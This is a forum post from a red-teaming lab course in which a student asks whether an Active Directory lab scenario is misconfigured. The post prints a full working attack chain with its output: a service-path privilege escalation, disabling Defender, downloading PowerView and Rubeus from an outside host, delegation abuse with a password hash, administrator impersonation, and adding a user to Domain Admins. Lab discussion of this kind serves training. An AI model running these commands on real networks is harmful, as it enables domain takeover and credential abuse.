Red-teaming Active Directory Lab #2 (ELS.BANK): scenario 3 protected users

friedrich_o-93cd2df1 · October 21, 2021, 8:04pm

Spoiler alert…

The solution states:

With everything set now, we can utilize Rubeus to get a ticket for “exch_adm” and assign the DCSync rights as we did in Scenario 1 (remember that Domain admins are members of “Protected users” so we can’t simply utilize this attack to get access to those accounts).

But executing the following commands will get a ticket for administrator and will still add a user to domain admins

# provide privesc.exe
sc.exe config "Service KMSELDI"  binPath=C:\Users\analyst1\Downloads\privesc.exe
sc.exe stop "Service KMSELDI" 
sc.exe start "Service KMSELDI"

# disable clm and defender as admin
Set-MpPreference -DisableRealtimeMonitoring $true
setx __PSLockdownPolicy 0 /m

# do slavi work
# Welcome123
runas /user:els\slavi "powershell -ep bypass"
cd $env:Userprofile
(New-Object Net.Webclient).DownloadFile("http://175.12.80.10:8080/PowerView.ps1", "$env:Userprofile\powerview.ps1")
(New-Object Net.Webclient).DownloadFile("http://175.12.80.10:8080/Rubeus.exe", "$env:Userprofile\Rubeus.exe")
Import-Module .\powerview.ps1
Set-DomainObjectOwner -Identity S-1-5-21-3192643952-2658629199-322554960-1000 -OwnerIdentity slavi -Verbose
Add-DomainObjectACL -TargetIdentity S-1-5-21-3192643952-2658629199-322554960-1000 -Rights All -PrincipalIdentity slavi
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList "els\svc-omada").Translate([System.Security.Principal.SecurityIdentifier])).Value
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-DomainObject -Identity S-1-5-21-3192643952-2658629199-322554960-1000 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
.\Rubeus.exe s4u /user:svc-omada /rc4:65F91B600E51F19A80593D0A62047CC5 /impersonateuser:administrator /msdsspn:"host/bank-dc.els.bank" /altservice:ldap,rpc,http,cifs /ptt
net group "Domain Admins" /domain /add analyst1
The request will be processed at a domain controller for domain els.bank.

The command completed successfully.

That seems to be in direct contradiction to the solution

is that a lab misconfiguration?

Topic		Replies	Views
Red Teaming Active Directory Lab #2 Task 2 Constrained Delegation Advanced Web Application Penetration Testing red , lab , cybersec	5	391	October 13, 2021
Red-Teaming Active Directory - ELS.BANK Advanced Web Application Penetration Testing red , lab	4	325	December 29, 2022
Host & Network Penetration Testing - System/Host Based Attacks - Windows Privilege Escalation - Access Token Impersonation Penetration Testing Student (SP) red , ejpt	2	85	February 29, 2024
LAB 3 - Compromising DC problem (moved from wrong tag) Advanced Penetration Testing red , lab , cybersec	4	464	December 22, 2021
LAB 3 - Compromising DC problem Advanced Web Application Penetration Testing red , lab	0	273	October 11, 2021

Red-teaming Active Directory Lab #2 (ELS.BANK): scenario 3 protected users

Related Topics